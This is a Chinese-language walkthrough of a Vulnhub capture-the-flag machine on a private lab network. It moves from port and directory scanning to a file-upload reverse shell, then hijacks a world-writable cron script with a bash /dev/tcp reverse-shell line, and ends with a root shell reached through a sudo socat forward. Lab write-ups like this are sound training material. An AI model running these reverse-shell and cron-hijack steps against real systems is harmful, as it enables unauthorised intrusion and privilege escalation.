目录
信息收集
arp
nmap
nikto
whatweb
WEB
信息收集
dirmap
文件上传
提权
系统信息收集
横向提权
信息泄露
get root
信息收集
arp
┌──(root㉿ru)-[~/kali/vulnhub]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:2f:dd:99, IPv4: 192.168.211.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.211.1 00:50:56:c0:00:08 VMware, Inc.
192.168.211.2 00:50:56:e6:61:4b VMware, Inc.
192.168.211.135 00:50:56:21:cf:ed VMware, Inc.
192.168.211.254 00:50:56:f0:b5:b8 VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.495 seconds (102.61 hosts/sec). 4 respondednmap
端口扫描┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -p- 192.168.211.135 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 13:59 CST
Nmap scan report for 192.168.211.135
Host is up (0.0036s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:50:56:21:CF:ED (VMware)Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds版本服务探测┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -sC -sV -O -p 80 192.168.211.135 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 14:00 CST
Nmap scan report for 192.168.211.135
Host is up (0.00049s latency).PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Freelancer - Start Bootstrap Theme
MAC Address: 00:50:56:21:CF:ED (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hopOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.22 secondsnikto
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nikto -h http://192.168.211.135/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.211.135
+ Target Hostname: 192.168.211.135
+ Target Port: 80
+ Start Time: 2024-04-08 15:47:27 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 6a7f, size: 5af24a0184072, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-04-08 15:47:53 (GMT8) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedwhatweb
┌──(root㉿ru)-[~/kali/vulnhub]
└─# whatweb -v http://192.168.211.135/
WhatWeb report for http://192.168.211.135/
Status : 200 OK
Title : Freelancer - Start Bootstrap Theme
IP : 192.168.211.135
Country : RESERVED, ZZSummary : Apache[2.4.38], Bootstrap, HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], JQuery, Script, X-UA-Compatible[IE=edge]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version : 2.4.38 (from HTTP Server Header)Google Dorks: (3)Website : http://httpd.apache.org/[ Bootstrap ]Bootstrap is an open source toolkit for developing with HTML, CSS, and JS. Website : https://getbootstrap.com/[ HTML5 ]HTML version 5, detected by the doctype declaration [ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : Debian LinuxString : Apache/2.4.38 (Debian) (from server string)[ JQuery ]A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX. Website : http://jquery.com/[ Script ]This plugin detects instances of script HTML elements and returns the script language/type. [ X-UA-Compatible ]This plugin retrieves the X-UA-Compatible value from the HTTP header and meta http-equiv tag. - More Info: http://msdn.microsoft.com/en-us/library/cc817574.aspx String : IE=edgeHTTP Headers:HTTP/1.1 200 OKDate: Mon, 08 Apr 2024 07:33:10 GMTServer: Apache/2.4.38 (Debian)Last-Modified: Sat, 12 Sep 2020 21:38:43 GMTETag: "6a7f-5af24a0184072-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 3377Connection: closeContent-Type: text/htmlWEB
信息收集
dirmap
┌──(root㉿ru)-[~/tools/dirscan/dirmap]
└─# python3 dirmap.py -i http://192.168.211.135/ -lcf ##### # ##### # # ## ###### # # # # ## ## # # # ## # # # # # ## # # # # ## # # ##### # # ###### ###### # # # # # # # # ###### # # # # # # # # v1.0[*] Initialize targets...
[+] Load targets from: http://192.168.211.135/
[+] Set the number of thread: 30
[+] Coroutine mode
[+] Current target: http://192.168.211.135/
[*] Launching auto check 404
[+] Checking with: http://192.168.211.135/ccjimqtouvulxwpfqmepgsutmqaakqkggbqjpmlnko
[*] Use recursive scan: No
[*] Use dict mode
[+] Load dict:/root/tools/dirscan/dirmap/data/dict_mode_dict.txt
[*] Use crawl mode
[200][text/html][3.30kb] http://192.168.211.135/index.html
[200][text/markdown][278.00b] http://192.168.211.135/readme.md
[200][text/html][588.00b] http://192.168.211.135/upload/
[200][text/html; charset=UTF-8][500.00b] http://192.168.211.135/upload/upload.php
[200][text/html][3.30kb] http://192.168.211.135/
[200][application/javascript][906.00b] http://192.168.211.135/js/contact_me.js
[200][image/png][18.79kb] http://192.168.211.135/img/portfolio/safe.png
[200][image/png][10.04kb] http://192.168.211.135/img/profile.png
[200][text/css][4.92kb] http://192.168.211.135/font-awesome/css/font-awesome.min.css
[200][application/javascript][32.45kb] http://192.168.211.135/js/jquery.js
[200][image/png][23.76kb] http://192.168.211.135/img/portfolio/submarine.png
[200][application/javascript][680.00b] http://192.168.211.135/js/classie.js
[200][image/png][27.33kb] http://192.168.211.135/img/portfolio/circus.png
[200][text/css][1.82kb] http://192.168.211.135/css/freelancer.css
[200][image/png][16.67kb] http://192.168.211.135/img/portfolio/cake.png
[200][image/png][25.29kb] http://192.168.211.135/img/portfolio/game.png
[200][application/javascript][622.00b] http://192.168.211.135/js/freelancer.js
[200][text/css][18.91kb] http://192.168.211.135/css/bootstrap.min.css
[200][image/png][35.66kb] http://192.168.211.135/img/portfolio/cabin.png
[200][application/javascript][9.19kb] http://192.168.211.135/js/bootstrap.min.js 99% (6600 of 6618) |################################################### | Elapsed Time: 0:00:13 ETA: 0:00:00
看来就是文件上传了!
文件上传
虽然上传成功了,但是不知道上传到哪了!我们再次进行目录检索!
┌──(root㉿ru)-[~/kali/vulnhub]
└─# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -u http://192.168.211.135/upload/FUZZ -t 100 --hc 404,403 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************Target: http://192.168.211.135/upload/FUZZ
Total requests: 17770=====================================================================
ID Response Lines Word Chars Payload
=====================================================================000000055: 301 9 L 28 W 325 Ch "files"
000003809: 200 31 L 85 W 903 Ch "http://192.168.211.135/upload/"
经过fuzz,发现files路径!
┌──(root?ru)-[~/kali/vulnhub]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.211.135: inverse host lookup failed: Unknown host
connect to [192.168.211.128] from (UNKNOWN) [192.168.211.135] 60876
Linux 32064e9210cb 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux08:09:12 up 22 min, 0 users, load average: 0.01, 0.87, 0.85
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 提权
系统信息收集
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/bin/mount
/bin/umount
/bin/su
$ ls -al /var/www/html
total 88
drwxr-xr-x 11 root root 4096 Sep 12 2020 .
drwxr-xr-x 1 root root 4096 Sep 10 2020 ..
drwxrwxrwx 2 root 1000 4096 Apr 8 2024 Maintenance-Web-Docker
drwxr-xr-x 2 root root 4096 Sep 12 2020 css
drwxr-xr-x 6 root root 4096 Sep 12 2020 font-awesome
drwxr-xr-x 2 root root 4096 Sep 12 2020 fonts
drwxr-xr-x 3 root root 4096 Sep 12 2020 img
-rw-r--r-- 1 root root 27263 Sep 12 2020 index.html
drwxr-xr-x 2 root root 4096 Sep 12 2020 js
drwxr-xr-x 2 root root 4096 Sep 12 2020 less
-rw-r--r-- 1 root root 11336 Sep 12 2020 license
drwxr-xr-x 2 root root 4096 Sep 12 2020 mail
-rw-r--r-- 1 root root 278 Sep 12 2020 readme.md
drwxr-xr-x 3 root root 4096 Sep 12 2020 upload$ ls -al
total 24
drwxrwxrwx 2 root 1000 4096 Apr 8 2024 .
drwxr-xr-x 11 root root 4096 Sep 12 2020 ..
-rwxrwxrwx 1 root root 164 Sep 13 2020 list.sh
-rwxr-xr-x 1 root root 204 Sep 12 2020 maintenance.sh
-rw-r--r-- 1 1000 1000 5066 Apr 8 08:42 out.txt
$ cat list.sh
#!/bin/bash
date >> /home/richard/web/Maintenance-Web-Docker/out.txt
ls /home/richard/web/upload/files/ | wc -l >> /home/richard/web/Maintenance-Web-Docker/out.txt$ date
Mon Apr 8 08:43:20 UTC 2024这些命令的作用是将当前日期追加到文件 /home/richard/web/Maintenance-Web-Docker/out.txt 中,然后统计目录 /home/richard/web/upload/files/ 中文件的数量,并将数量追加到同一文件中。list.sh是可读可写可执行的!我们利用一下!横向提权
echo "/bin/bash -c 'bash -i>& /dev/tcp/192.168.211.128/7878 0>&1'" > list.sh
richard@EC2:~$ ls
ls
HackTools
user.txt
web
richard@EC2:~$ cat user.txt
cat user.txt
3a6b99f59ea363803bcafc7f5dd9b1e8
richard@EC2:~$ richard@EC2:~/HackTools$ sudo -l
sudo -l
Matching Defaults entries for richard on EC2:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser richard may run the following commands on EC2:(ALL) NOPASSWD: /home/richard/HackTools/socat TCP-LISTEN\:8080\,forkTCP\:127.0.0.1\:90
richard@EC2:~/HackTools$ /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90
我们使用sudo运行!
果然开放了新的端口!
信息泄露
经过测试,存在信息泄露漏洞!这个服务是以root权限运行的,我们可以执行我们之前上传的payload即可拿到root权限的shell!上传路径 /home/richard/web/uplaod/files/shell.php
get root
┌──(root?ru)-[~/tools/dirscan/dirmap]
└─# nc -lvvp 2345
listening on [any] 2345 ...
192.168.211.135: inverse host lookup failed: Unknown host
connect to [192.168.211.128] from (UNKNOWN) [192.168.211.135] 42992
Linux EC2 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux05:06:55 up 32 min, 0 users, load average: 6.43, 6.14, 4.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
proof.txt
# cat proof.txt_ _ _ _ _ _
| | | | | | | | | | |
| | | | ___| | | __| | ___ _ __ ___| |
| |/\| |/ _ \ | | / _` |/ _ \| '_ \ / _ \ |
\ /\ / __/ | | | (_| | (_) | | | | __/_|\/ \/ \___|_|_| \__,_|\___/|_| |_|\___(_)07f61ca07bc617f9639b412423b2cc6f
Twitter: @0x04E1
# 
